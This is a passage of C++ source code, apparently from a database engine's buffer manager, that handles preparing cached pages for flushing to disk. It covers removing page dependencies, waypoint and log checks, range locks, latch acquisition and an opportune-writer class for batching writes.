_In_ const BOOL fRemoveDependencies )
{
Assert( pbf->sxwl.FOwnWriteLatch() && bfltWrite == bfltHave ); // expected
ERR err = JET_errSuccess;
CBFIssueList bfil;
ULONG cIter = 0;
// try to prepare the page for flushing / possibly removing any dependencies ...
while( ( err = ErrBFIPrepareFlushPage( pbf, bfltHave, ior, qos, fRemoveDependencies ) ) < JET_errSuccess )
{
cIter++;
// must issue anything enqueued (older BFs / time dependencies, or log flushes)
CallS( bfil.ErrIssue( fTrue ) );
// this might go off... it did for me, but rarely, but not rare enough ...
//Assert( cIter < 10 );
if ( ( cIter >= 10 ) || ( err == errBFIPageAbandoned ) )
{
// We try this 10 times, and then give up.
// Also, fail fast if the BF is abandoned.
return err;
}
UtilSleep( dtickFastRetry );
}
CallS( bfil.ErrIssue( fTrue ) );
Expected( err >= JET_errSuccess );
return err;
}
#ifdef DEBUG
VOID BFIAssertReqRangeConsistentWithLgpos( FMP* const pfmp, const LGPOS& lgposOB0, const LGPOS& lgposModify, const CHAR* const szTag )
{
const BOOL fIsOB0Set = CmpLgpos( lgposOB0, lgposMax ) != 0;
const BOOL fIsLgposModifySet = CmpLgpos( lgposModify, lgposMin ) != 0;
if ( !fIsOB0Set && !fIsLgposModifySet )
{
return;
}
LONG lGenMinRequired = 0, lGenMaxRequired = 0;
LONG lGenMinConsistent = 0;
LONG lGenPreRedoMinConsistent = 0, lGenPreRedoMinRequired = 0;
ULONG ulTrimCount = 0, ulShrinkCount = 0;
{
PdbfilehdrReadOnly pdbfilehdr = pfmp->Pdbfilehdr();
lGenMinRequired = pdbfilehdr->le_lGenMinRequired;
lGenMaxRequired = pdbfilehdr->le_lGenMaxRequired;
lGenMinConsistent = pdbfilehdr->le_lGenMinConsistent;
lGenPreRedoMinConsistent = pdbfilehdr->le_lGenPreRedoMinConsistent;
lGenPreRedoMinRequired = pdbfilehdr->le_lGenPreRedoMinRequired;
ulTrimCount = pdbfilehdr->le_ulTrimCount;
ulShrinkCount= pdbfilehdr->le_ulShrinkCount;
}
Assert( lGenMinRequired > 0 );
Assert( lGenMinConsistent > 0 );
Assert( lGenMaxRequired > 0 );
Assert( lGenMinRequired <= lGenMinConsistent );
Assert( lGenMinConsistent <= lGenMaxRequired );
const BOOL fLowerMinReqLogGenOnRedo = ( pfmp->ErrDBFormatFeatureEnabled( JET_efvLowerMinReqLogGenOnRedo ) == JET_errSuccess );
Assert( fLowerMinReqLogGenOnRedo || ( ( lGenPreRedoMinConsistent == 0 ) && ( lGenPreRedoMinRequired == 0 ) ) );
Assert( ( lGenPreRedoMinConsistent == 0 ) ||
( ( lGenPreRedoMinConsistent > lGenMinConsistent ) &&
( lGenPreRedoMinConsistent <= lGenMaxRequired ) ) );
Assert( ( lGenPreRedoMinRequired == 0 ) ||
( ( lGenPreRedoMinRequired > lGenMinRequired ) &&
( lGenPreRedoMinRequired <= lGenMaxRequired ) ) );
// We would normally bail here if JET_efvLowerMinReqLogGenOnRedo is not supported because we can't guarantee that the asserts
// below will hold, but we've decided to keep the assert even if that EFV is not supported to catch cases in which old customer DBs
// are being debugged and we don't want to lose the asserts. Therefore, selectively disable it for some tests.
if ( FNegTest( fDisableAssertReqRangeConsistentLgpos ) )
{
return;
}
if ( fIsOB0Set )
{
AssertSz( lgposOB0.lGeneration >= lGenMinConsistent, "%hsLgposOB0TooOld", szTag );
}
if ( fIsLgposModifySet )
{
AssertSz( lgposModify.lGeneration >= lGenMinConsistent, "%hsLgposModifyTooOld", szTag );
}
// There are three cases where we could be attempting to write a page with a lgposOldestBegin0 or lgposModify that
// are older than the initial lGenMinConsistent of the database. Note that they all involve starting recovery from a log generation
// which is older than the current lGenMinConsistent of the database. Although this would normally happen upon deleting
// the checkpoint file, it can happen normally if we just start at lGenMinRequired and we encounter one of the three
// cases below when replaying the range between lGenMinRequired and lGenMinConsistent.
//
// 1- We are fixing up a lost flush, i.e., we are trying to redo a page modification which is supposed to have already
// been written to disk, but the forced-recovery from older than lGenMinConsistent is detecting that it needs to be
// redone.
//
// 2- Trim is enabled and we found a blank page that we thought needed to be redone (because we can't determine if a blank page
// became blank as a result of a future trim, or if we are redoing the initial instantiation of the page), but actually didn't
// because it is currently blank due to a future trim affecting the page.
//
// 3- Shrink is enabled and we found a blank page that we thought needed to be redone (because we can't determine if a blank page
// became blank as a result of a future shrink/re-growth, or if we are redoing the initial instantiation of the page), but actually didn't
// because it is currently blank due to a future shrink/re-growth affecting the page.
//
// Note that, while #1 can only happen in cases where we dropped a page write (a bug in the engine or a hardware issue), #2 and #3
// can happen naturally if either Trim or Shrink are enabled and the required range involves instantiating the page as a new page,
// followed by either the page being subsequently released and trimmed or shrunk/re-grown over.
if ( !FNegTest( fCorruptingWithLostFlushWithinReqRange ) && ( ulTrimCount == 0 ) && ( ulShrinkCount == 0 ) )
{
if ( fIsOB0Set && ( lGenPreRedoMinConsistent != 0 ) )
{
AssertSz( lgposOB0.lGeneration >= lGenPreRedoMinConsistent, "%hsLgposOB0TooOldPreRedo", szTag );
}
if ( fIsLgposModifySet && ( lGenPreRedoMinConsistent != 0 ) )
{
AssertSz( lgposModify.lGeneration >= lGenPreRedoMinConsistent, "%hsLgposModifyTooOldPreRedo", szTag );
}
}
}
#endif // DEBUG
TICK g_tickLastRBSWrite = 0;
ERR ErrBFIPrepareFlushPage(
_In_ const PBF pbf,
_In_ const BFLatchType bfltHave,
_In_ IOREASON ior,
_In_ const OSFILEQOS qos,
_In_ const BOOL fRemoveDependencies,
_Out_opt_ BOOL * const pfPermanentErr )
{
ERR err = JET_errSuccess;
FMP* pfmp = NULL;
BOOL fRangeLocked = fFalse;
TLS * ptls = Ptls();
Assert( FBFIUpdatablePage( pbf ) );
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
Enforce( PvBFIAcquireIOContext( pbf ) == NULL );
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
Assert( NULL == pfPermanentErr || *pfPermanentErr == fFalse /* by ErrBFIFlushPage() */ );
// check the error state of this BF. if the BF is already in an error
// state, fail immediately
//
// NOTE: this check makes I/O errors "permanent" such that if we ever fail
// when trying to flush a BF then we will never try again. we may want to
// change this behavior in the future. if so then we need to remove this
// check and make sure that anyone who removes this error code has the W
// Latch to avoid interactions with ErrBFIValidatePage
if ( pfPermanentErr &&
pbf->err < JET_errSuccess )
{
*pfPermanentErr = fTrue;
}
Call( pbf->err );
Assert( NULL == pfPermanentErr || *pfPermanentErr == fFalse /* should have bailed on permanent errors */ );
// if this is an abandoned BF, fail out and let the abandon code deal with it
Expected( !pbf->fAbandoned );
if ( pbf->fAbandoned )
{
Error( ErrERRCheck( errBFIPageAbandoned ) );
}
// if this BF had a flush order dependency on another BF and that BF was
// purged then it is unflushable
if ( pbf->bfbitfield.FDependentPurged() )
{
Call( ErrERRCheck( errBFIDependentPurged ) );
}
// if this is the I/O thread then do not allow the page to be flushed to
// avoid a possible deadlock if the IOREQ pool is empty
if ( FIOThread() )
{
AssertSz( fFalse, "We have changed the Buffer Manager so this should never happen. Please tell SOMEONE if it does." );
Call( ErrERRCheck( errBFIPageFlushDisallowedOnIOThread ) );
}
// remove all flush order dependencies from this BF, which are now restricted
// to time-dependencies (from versioned pages)
while ( pbf->pbfTimeDepChainNext != pbfNil )
{
// find a leaf of our branch in the time dependency chain, i.e., the oldest
// version of the page, which must be flushed first
g_critBFDepend.Enter();
PBF pbfT = PbfBFIGetFlushOrderLeaf( pbf, ptls->fCheckpoint );
// Inter-page dependencies (i.e. between different pages, including different databases) are dead.
AssertTrack( pbf->pgno == pbfT->pgno && pbf->ifmp == pbfT->ifmp, "InterPageDependencyDeprecated" );
g_critBFDepend.Leave();
// possibly async flush this BF
//
// NOTE: it is possible that someone else already flushed this
// page. this is because the BF will be in the time dependency chain
// until after the write completes. if this happens, we will
// get JET_errSuccess and retry the entire operation
//
// NOTE: this call will result in at least one level of recursion.
// usually, we will only recurse once because we are trying to flush
// dependency chain heads. it is possible that another thread could
// write latch the page, add a dependency, and release the write
// latch between the time we leave the critical section protecting
// the dependency tree and try to get the exclusive latch on the
// page. this would cause us to recurse another level. because we
// can recurse far faster than any other thread should be able to
// do the above, the probability of deep recursion should be remote.
// if we do happen to catch someone doing this, we will stop
// recursing with errBFLatchConflict because we will not be able
// to exclusively latch the page to flush it
//
// NOTE: we must disable ownership tracking because it is possible
// that we will try to latch a page that we already have latched
// while trying to flush the dependency chain. yes, this is tragic.
// the only reason it works is because we try-acquire the exclusive
// latch instead of acquiring it and this will work even if we
// already have the shared latch
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
ior.AddFlag( iorfDependantOrVersion );
err = ErrBFIFlushPage( pbfT, ior, qos, bfdfDirty, !fRemoveDependencies );
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
Call( err );
}
// log and remove all undo info from the BF
if ( pbf->prceUndoInfoNext != prceNil )
{
if ( !fRemoveDependencies )
{
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
ENTERCRITICALSECTION ecs( &g_critpoolBFDUI.Crit( pbf ) );
while ( pbf->prceUndoInfoNext != prceNil )
{
// try to log the current undo info, but do not wait if the log buffer
// is full
LGPOS lgpos;
err = ErrLGUndoInfoWithoutRetry( pbf->prceUndoInfoNext, &lgpos );
// we succeeded logging the undo info
if ( err >= JET_errSuccess )
{
// remove this undo info from the BF
BFIRemoveUndoInfo( pbf, pbf->prceUndoInfoNext, lgpos );
}
// we failed logging the undo info
else
{
// we failed because the log is down
if ( err == JET_errLogWriteFail ||
err == JET_errLogDisabledDueToRecoveryFailure )
{
// fail with this error
Call( err );
}
// we failed because we cannot log undo info during redo
else if ( err == JET_errCannotLogDuringRecoveryRedo )
{
// we must wait for this dependency to be removed via
// BFRemoveUndoInfo()
//
// NOTE: act as if this was a latch conflict so that the
// allocation quota system views it as an external buffer
// allocation (which it is... sort of)
Call( ErrERRCheck( errBFLatchConflict ) );
}
// we failed because the log buffers are full
else
{
Assert( err == errLGNotSynchronous );
// prepare to flush the log for the instance of this IFMP
// for this thread. if we cannot do this then fail with
// the error
Call( ptls->pbfil->ErrPrepareLogWrite( pbf->ifmp ) );
// we must wait to remove this dependency
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
}
}
}
// reject the flush if it is for a page touched after the waypoint
//
// WARNING: we must make this determination AFTER removing undo info,
// because the act of removing undo info will almost certainly update
// lgposModify beyond the waypoint
LOG * const plog = PinstFromIfmp( pbf->ifmp )->m_plog;
LGPOS lgposWaypoint;
lgposWaypoint = g_rgfmp[ pbf->ifmp ].LgposWaypoint(); // get the waypoint.
// The lgposModify and Waypoint are both lgposMin when you attach a database without
// logging, so the first check is to verify this BF is for a logged database, and ...
// the 2nd check is the heart of LLR / jetlag, it verifies the page to be flushed
// was not modified later than the waypoint / LLR depth.
if ( ( CmpLgpos( &pbf->lgposModify, &lgposMin ) != 0 ) &&
( CmpLgpos( &pbf->lgposModify, &lgposWaypoint ) >= 0 ) )
{
// the log is down
if ( plog->FNoMoreLogWrite() )
{
// fail with this error
Call( ErrERRCheck( JET_errLogWriteFail ) );
}
// we can get in a situation where we have the log buffer lazily flushed over the
// boundary of a log file, this causes us to spin endlessly against the waypoint
// until the log is flushed, so lets flush the log
LGPOS lgposTip;
plog->LGLogTipWithLock( &lgposTip ); // don't think we need: LgposLGLogTipNoLock
if ( plog->LGGetCurrentFileGenWithLock() < lgposTip.lGeneration &&
!plog->FLGProbablyWriting() )
{
// should be trivially true (OR how did the waypoint get onto unflushed data!?), and
// if not, we should probably add it to the if clause above?
Expected( lgposWaypoint.lGeneration < lgposTip.lGeneration );
Call( ptls->pbfil->ErrPrepareLogWrite( pbf->ifmp ) );
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
// maybe things have improved ... so request waypoint maint ...
BFIMaintWaypointRequest( pbf->ifmp );
// request that we maintain idle databases so that pages pinned by the
// waypoint don't cause other maintenance functions to get stuck on
// those pages for a prolonged period of time
//
// this task does not need to run if the current LLR is configured to zero.
if ( UlParam( PinstFromIfmp( pbf->ifmp ), JET_paramWaypointLatency ) > 0 )
{
BFIMaintIdleDatabaseRequest( pbf );
}
Call( ErrERRCheck( errBFIPageTouchTooRecent ) );
}
// this BF is depended on the log
LGPOS lgposWriteTip, lgposFlushTip;
plog->LGWriteAndFlushTip( &lgposWriteTip, &lgposFlushTip );
const INT icmpWrite = CmpLgpos( &pbf->lgposModify, &lgposWriteTip );
const INT icmpFlush = CmpLgpos( &pbf->lgposModify, &lgposFlushTip );
const BOOL fSnapshotFlushed = !g_rgfmp[ pbf->ifmp ].FRBSOn() || CmpRbspos( g_rgfmp[ pbf->ifmp ].PRBS()->RbsposFlushPoint(), pbf->rbsposSnapshot ) >= 0;
if ( !plog->FLogDisabled() &&
icmpWrite >= 0 )
{
if ( plog->FRecoveringMode() == fRecoveringRedo || !fRemoveDependencies )
{
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
// the log is down
if ( plog->FNoMoreLogWrite() )
{
// fail with this error
Call( ErrERRCheck( JET_errLogWriteFail ) );
}
// the log is up
else
{
// prepare to flush the log for the instance of this IFMP
// for this thread. if we cannot do this then fail with
// the error
Call( ptls->pbfil->ErrPrepareLogWrite( pbf->ifmp ) );
// we must wait to remove this dependency
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
}
else if ( !plog->FLogDisabled() &&
icmpFlush >= 0 )
{
// the log is down
if ( plog->FNoMoreLogWrite() )
{
// fail with this error
Call( ErrERRCheck( JET_errLogWriteFail ) );
}
// the log is up
// We will not flush the log currently, this is ok for windows right now since we do Flush for Capacity/Commit Flushes.
// but we need to revisit when we remove capacity flushes.
// Note that LLR disabled Capacity/Commit Flushes and Exchange store uses LLR.
Call( ErrERRCheck( errBFIPageTouchTooRecent ) );
}
else if ( !fSnapshotFlushed )
{
Assert( g_rgfmp[ pbf->ifmp ].FRBSOn() );
if ( fRemoveDependencies && g_rgfmp[ pbf->ifmp ].PRBS()->FTooLongSinceLastFlush() )
{
Call( ptls->pbfil->ErrPrepareRBSWrite( pbf->ifmp ) );
// We will have to return error on this iteration, and try again later.
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
// We are not ready to flush RBS yet
Call( ErrERRCheck( errBFIPageTouchTooRecent ) );
}
// check the range lock (backup dependency)
// get the active range lock
AssertTrack( !pbf->bfbitfield.FRangeLocked(), "BFPrepRangeAlreadyLocked" );
CMeteredSection::Group irangelock = CMeteredSection::groupTooManyActiveErr;
pfmp = &g_rgfmp[ pbf->ifmp ];
fRangeLocked = pfmp->FEnterRangeLock( pbf->pgno, &irangelock );
if ( fRangeLocked )
{
// leave our reference on this range lock until this BF has
// been flushed or we decide to not flush this BF
pbf->bfbitfield.SetFRangeLocked( fTrue );
Assert( irangelock == 0 || irangelock == 1 );
pbf->irangelock = BYTE( irangelock );
Assert( pbf->irangelock == irangelock );
}
else
{
if ( irangelock == CMeteredSection::groupTooManyActiveErr )
{
// no reference on range lock to release, because we didn't get it
Error( ErrERRCheck( errDiskTilt ) );
}
else
{
// there is a dependency on this BF that we must wait to remove
Error( ErrERRCheck( errBFIRemainingDependencies ) );
}
}
Assert( fRangeLocked );
Assert( pbf->bfbitfield.FRangeLocked() );
Assert( irangelock != CMeteredSection::groupTooManyActiveErr );
Assert( pbf->irangelock != CMeteredSection::groupTooManyActiveErr ); // sadly trivially true, consider giving one more bit to irangelock
// this page is not the full size (required to be persisted on disk), so
// rehydrate the page to full size for flush
if ( pbf->icbBuffer != pbf->icbPage )
{
Assert( bfdfClean == pbf->bfdf || bfdfUntidy == pbf->bfdf );
if ( bfltExclusive == bfltHave )
{
const CSXWLatch::ERR errTryW = pbf->sxwl.ErrTryUpgradeExclusiveLatchToWriteLatch();
if ( CSXWLatch::ERR::errLatchConflict == errTryW )
{
// Things didn't work out, sorry.
Call( ErrERRCheck( errBFLatchConflict ) );
}
Assert( CSXWLatch::ERR::errSuccess == errTryW );
}
BFIRehydratePage( pbf );
Assert( pbf->icbBuffer == pbf->icbPage );
if ( bfltExclusive == bfltHave )
{
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
}
// set checksum and flush type.
if ( FBFIDatabasePage( pbf ) )
{
CFlushMap* const pfm = pfmp->PFlushMap();
const BOOL fIsDirty = ( pbf->bfdf >= bfdfDirty );
const BOOL fIsPagePatching = ( ior.Iorp() == IOREASONPRIMARY( iorpPatchFix ) );
const BOOL fIsFmRecoverable = pfm->FRecoverable();
const BOOL fIsOB0Set = CmpLgpos( &pbf->lgposOldestBegin0, &lgposMax ) != 0;
Assert( CmpLgpos( &pbf->lgposOldestBegin0, &lgposMin ) != 0 );
const BOOL fIsLgposModifySet = CmpLgpos( &pbf->lgposModify, &lgposMin ) != 0;
Assert( CmpLgpos( &pbf->lgposModify, &lgposMax ) != 0 );
const CPAGE::PageFlushType pgftMapCurrent = pfm->PgftGetPgnoFlushType( pbf->pgno );
CPAGE::PageFlushType pgftPageCurrent;
CPAGE::PageFlushType pgftPageNext = pgftMapCurrent;
AssertSz( !( pbf->fOlderVersion || !pbf->fCurrentVersion ) || fIsDirty, "Must not write non-dirty older versions." );
CPAGE cpage;
Assert( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, CbBFIBufferSize( pbf ) );
if ( !FBFIBufferIsZeroed( pbf ) && ( cpage.Dbtime() != dbtimeShrunk ) && ( cpage.Dbtime() != dbtimeRevert ) )
{
pgftPageCurrent = cpage.Pgft();
if ( pbf->bfdf > bfdfClean )
{
// There is a subtlety in picking the flush map to use as the basis for the next
// state. If you used the page state, and imagine that you have versioned the page,
// before trying to flush the page, you'd flip the bit on the older page, meanwhile the
// newer page would be left in the old state, so you'd have a hole in your lost flush
// detection logic.
//
// Also, pick the current state in case the page isn't clean and does not have a valid
// OB0 or LgposModify. The cases we know about are:
// 1) the unmodified current version of a versioned page. This is acceptable because
// the version with a valid OB0 is the one that should have held the checkpoint back
// for the purposes of rebuilding the flush map on crash.
// 2) Untidy pages. In this case, we incur the risk of not detecting a lost flush, but
// that is acceptable because an 'untidy' modification is losable.
// 3) Index pages during batch index creation do have an OB0, but not a LgposModify, which
// means the flush state is not crash-consistent, since the operations are unlogged.
// The logic above is not applied in case of an unlogged database. In that case, OB0 is never
// set.
if ( fIsPagePatching )
{
pgftPageNext = CPAGE::pgftUnknown;
}
else if ( ( pgftMapCurrent == CPAGE::pgftUnknown ) && ( pgftPageCurrent == CPAGE::pgftUnknown ) )
{
pgftPageNext = CPAGE::PgftGetNextFlushType( CPAGE::pgftUnknown );
}
else
{
const BOOL fChangeFlushType = !fIsFmRecoverable || ( fIsOB0Set && fIsLgposModifySet && fIsDirty );
const CPAGE::PageFlushType pgftPageNextSeed = ( pgftMapCurrent != CPAGE::pgftUnknown ) ? pgftMapCurrent : pgftPageCurrent;
Assert( pgftPageNextSeed != CPAGE::pgftUnknown );
if ( fChangeFlushType )
{
pgftPageNext = CPAGE::PgftGetNextFlushType( pgftPageNextSeed );
}
else
{
pgftPageNext = pgftPageNextSeed;
}
}
Assert( ( pgftPageNext != CPAGE::pgftUnknown ) || fIsPagePatching );
// Stamp flush type and checksum. Note we do not update the flush map until the I/O has completed.
cpage.PreparePageForWrite( pgftPageNext );
}
// Validation
BFIValidatePagePgno( pbf );
}
else
{
pgftPageCurrent = CPAGE::pgftUnknown;
pgftPageNext = CPAGE::pgftUnknown;
}
cpage.UnloadPage();
if ( !fIsDirty && fIsFmRecoverable &&
( pgftMapCurrent != CPAGE::pgftUnknown ) &&
( pgftPageCurrent != CPAGE::pgftUnknown ) )
{
AssertSz( ( pgftMapCurrent == pgftPageCurrent ) && ( pgftPageCurrent == pgftPageNext ), "Non-dirty page must match in-memory flush state." );
}
// Make sure the relevant lgpos's are consistent with the required range stamped in the DB header.
OnDebug( BFIAssertReqRangeConsistentWithLgpos( pfmp, pbf->lgposOldestBegin0, pbf->lgposModify, "PrepareFlushPage" ) );
// Force a sync write of the affected flush map page if required.
if ( fIsPagePatching && fIsFmRecoverable )
{
if ( pfm->ErrSetPgnoFlushTypeAndWait( pbf->pgno, CPAGE::pgftUnknown, dbtimeNil ) < JET_errSuccess )
{
Error( ErrERRCheck( errBFIReqSyncFlushMapWriteFailed ) );
}
}
}
// prepare to issue I/O against this IFMP for this thread. if we cannot
// do this then release our range lock and fail with the error
if ( ( err = ptls->pbfil->ErrPrepareWrite( pbf->ifmp ) ) < JET_errSuccess )
{
Call( err );
}
BFIAssertReadyForWrite( pbf );
HandleError:
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
if ( ( err < JET_errSuccess ) && fRangeLocked )
{
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFPrepFlushRangeNotLocked" );
pfmp->LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
fRangeLocked = fFalse;
}
// we cannot remove all dependencies on this BF due to a fatal error
if ( err < JET_errSuccess &&
err != JET_errOutOfMemory &&
err != errDiskTilt &&
err != errBFIRemainingDependencies &&
err != errBFIPageTouchTooRecent &&
err != errBFIPageFlushed &&
err != errBFIPageFlushPending &&
err != errBFIPageFlushPendingSlowIO &&
err != errBFIPageFlushPendingHungIO &&
err != errBFLatchConflict &&
err != errBFIPageFlushDisallowedOnIOThread &&
err != errBFIReqSyncFlushMapWriteFailed )
{
// set this BF to the appropriate error state
pbf->err = SHORT( err );
Assert( pbf->err == err );
Assert( pbf->err != JET_errFileIOBeyondEOF ); // illegal to have EOF lingering in the cache
}
// return the result of the remove dependencies operation
return err;
}
BOOL FBFITryAcquireExclusiveLatchForMaint( const PBF pbf )
{
// NOTE: we must disable ownership tracking because it is possible
// that we will try to latch a page that we already have latched
// the only reason it works is because we try-acquire the exclusive
// latch instead of acquiring it and this will work even if we
// already have the shared latch
//
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
const CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
if ( errSXWL != CSXWLatch::ERR::errSuccess )
{
Assert( errSXWL == CSXWLatch::ERR::errLatchConflict );
return fFalse; // too bad, we fail ...
}
pbf->sxwl.ClaimOwnership( bfltExclusive );
return fTrue;
}
// try to acquire an exclusive latch for flushing purposes, or return success
// if flush was completed.
//
// The fUnencumberedPath means that this function is being called from a path
// that does not need to keep the page un-modified (such as background processes
// like checkpoint maintenance or scavenge). The other possibility is due to
// the lockless-IO model, foreground threads may complete the flush by calling
// this API during read upgrade to write-latch for example.
ERR ErrBFIAcquireExclusiveLatchForFlush( PBF pbf, __in const BOOL fUnencumberedPath )
{
ERR err = JET_errSuccess;
// can we exclusively latch this BF?
CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
// Do not flush abandoned pages.
if ( pbf->fAbandoned )
{
pbf->sxwl.ReleaseExclusiveLatch();
Error( ErrERRCheck( errBFIPageAbandoned ) );
}
// In latchless IO model we have to check if we have or don't have the x-latch ...
if ( pbf->err == wrnBFPageFlushPending )
{
if ( !FBFICompleteFlushPage( pbf, bfltExclusive, fUnencumberedPath ) )
{
err = ErrBFIFlushPendingStatus( pbf );
Assert( err < JET_errSuccess );
// return flush in progress
pbf->sxwl.ReleaseExclusiveLatch();
Error( err );
}
// else the IO is completed.
// With view-cache remapping, the FBFICompleteFlushPage() can leave
// the buffer in a freshly IO-error'd state (as if there was a read
// IO error) ... this path can handle that ... we fail out of prepare
// flush page if the BF is in an error'd state.
// completed the state transition associated with the write IO ...
Assert( pbf->err < JET_errSuccess || pbf->bfdf == bfdfClean );
Assert( FBFIUpdatablePage( pbf ) );
// all this is OK, we still pass back w/ the x-latch, as then ErrBFIFlushPage()
// or CBFOpportuneWriter::ErrPrepareBFForOpportuneWrite_() will process the
// BF as a clean buffer and behave accordingly.
}
// Note you can check this outside of g_critBFDepend, because we only add versions at
// the head of the chain, and if we remove a version after we checked, then the called
// function will make the right decision from within g_critBFDepend.
if ( pbf->pbfTimeDepChainNext )
{
// we want to remove any clean versions below this
(void)ErrBFIEvictRemoveCleanVersions( pbf );
// we do not care about errors, we will then fall to the later write and prepare write
// functions which will ensure the right things are done.
}
return JET_errSuccess;
}
else
{
// the page is latched ...
// we do not claim errBFIPageFlushPending when pbf->err == wrnBFPageFlushPending because
// if the BF is latched, either
// 1. it is just now being flushed, and will be unlatched in a moment (no big deal).
// 2. it is latched possibly for usage of ErrBFIVersionCopyPage(), possibly even on
// this thread, so we return latch conflict so ErrBFIMaintScavengeIScavengePages()
// does not deadlock trying to alloc a page for ErrBFIVersionCopyPage().
// return latch confict because we could not flush the page
Call( ErrERRCheck( errBFLatchConflict ) );
}
HandleError:
Assert( JET_errSuccess == err || pbf->sxwl.FNotOwner() );
Assert( JET_errSuccess != err || pbf->sxwl.FOwnExclusiveLatch() );
return err;
}
class CBFOpportuneWriter
{
public:
CBFOpportuneWriter( ULONG cbfMax, ULONG cbfMaxCleanRun, IOREASON iorBase, OSFILEQOS qos ) :
m_cbfMax( cbfMax ), m_cbfMaxCleanRun( cbfMaxCleanRun ), m_iorBase( iorBase ), m_qos( qos ), m_cbfUseful( 0 ), m_cbfLatched( 0 )
{
Assert( m_iorBase.Iorp() != iorpNone );
memset( m_rgpbf, 0, sizeof( m_rgpbf[ 0 ] ) * m_cbfMax );
}
~CBFOpportuneWriter();
// Performs opportune writes for the pages around pgno.
// The specified pgno should already be written (this method does not write it).
void PerformOpportuneWrites( const IFMP ifmp, const PGNO pgno );
private:
void AssertValid_() const;
bool FFull_() const { return m_cbfMax <= m_cbfLatched; }
ULONG CBFLatched() const { return m_cbfLatched; }
ERR ErrCanAddBF_( const PBF pbf );
ERR ErrAddBF_( const PBF pbf );
void RevertBFs_( ULONG ibfStart = 0); // exclude BFs from ibfStart from opportune write
void FlushUsefulBFs_();
bool FVerifyCleanBFs_(); // verify checksum of clean BFs are still valid
ERR ErrPrepareBFForOpportuneWrite_( const PBF pbf );
void GetFlushableNeighboringBFs_( const IFMP ifmp, const PGNO pgno, const INT iDelta );
const IOREASON m_iorBase;
const OSFILEQOS m_qos;
const ULONG m_cbfMax; // maximum # of BFs we can hold
const ULONG m_cbfMaxCleanRun; // maximum # of clean BFs of a gap
// Latched BFs: all the BFs we have latched so far
// Useful BFs: BFs we surely want to flush
// i.e. latched clean BFs won't become "useful" until next dirty BF comes
ULONG m_cbfUseful;
ULONG m_cbfLatched;
// we always use _alloca and placement new to allocate object of CBFOpportuneWriter,
// the extra space from the allocation goes nicely into this array.
PBF m_rgpbf[];
};
void CBFOpportuneWriter::AssertValid_() const
{
Assert( m_cbfMaxCleanRun <= m_cbfMax );
Assert( m_cbfUseful <= m_cbfLatched );
Assert( m_cbfLatched <= m_cbfMax );
Assert( qosIOOptimizeCombinable & m_qos );
}
ERR CBFOpportuneWriter::ErrCanAddBF_( const PBF pbf )
{
ERR err = JET_errSuccess;
AssertValid_();
Assert( pbf->sxwl.FOwnExclusiveLatch() );
// too many BFs
if ( FFull_() )
{
Call( ErrERRCheck( errBFIOutOfBatchIOBuffers ) );
}
// too big a gap of tentative BFs
if ( bfdfClean == pbf->bfdf && m_cbfUseful + m_cbfMaxCleanRun <= m_cbfLatched )
{
Call( ErrERRCheck( errBFIOutOfBatchIOBuffers ) );
}
HandleError:
AssertValid_();
return err;
}
ERR CBFOpportuneWriter::ErrAddBF_( const PBF pbf )
{
ERR err = JET_errSuccess;
AssertValid_();
Assert( pbf->sxwl.FOwnExclusiveLatch() );
// call ErrCanAddBF_ to really make sure
Call( ErrCanAddBF_( pbf ) );
if ( ( m_cbfLatched + 1 < m_cbfMax ) && m_rgpbf[ m_cbfLatched + 1 ] )
{
// ensure the previously stored BF is not latched ...
Assert( m_rgpbf[ m_cbfLatched + 1 ]->sxwl.FNotOwner() );
}
// add the BF to the target list of flushes
m_rgpbf[ m_cbfLatched++ ] = pbf;
if ( bfdfClean != pbf->bfdf )
{
m_cbfUseful = m_cbfLatched;
}
HandleError:
AssertValid_();
return err;
}
void CBFOpportuneWriter::RevertBFs_( ULONG ibfStart )
{
for ( ULONG ibf = ibfStart; ibf < m_cbfLatched; ibf++ )
{
PBF pbf = m_rgpbf[ ibf ];
if ( pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() );
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFRevertRangeNotLocked" );
g_rgfmp[ pbf->ifmp ].LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
pbf->sxwl.ReleaseExclusiveLatch();
}
}
m_cbfLatched = min( m_cbfLatched, ibfStart );
m_cbfUseful = min( m_cbfUseful, ibfStart );
AssertValid_();
}
CBFOpportuneWriter::~CBFOpportuneWriter()
{
AssertValid_();
for ( ULONG ibf = 0; ibf < m_cbfMax; ibf++ )
{
PBF pbf = m_rgpbf[ ibf ];
if ( pbf )
{
Assert( pbf->sxwl.FNotOwnExclusiveLatch() );
}
}
}
void CBFOpportuneWriter::FlushUsefulBFs_()
{
ERR errLastFlush = errCodeInconsistency;
ULONG cbfUseful = m_cbfUseful;
if ( cbfUseful )
{
ULONG ibf;
for ( ibf = 0; ibf < cbfUseful; ++ibf )
{
Assert( m_qos & qosIOOptimizeCombinable );
const OSFILEQOS qosT = m_qos | ( ( m_rgpbf[ ibf ]->bfdf == bfdfClean ) ? qosIOOptimizeOverwriteTracing : 0 );
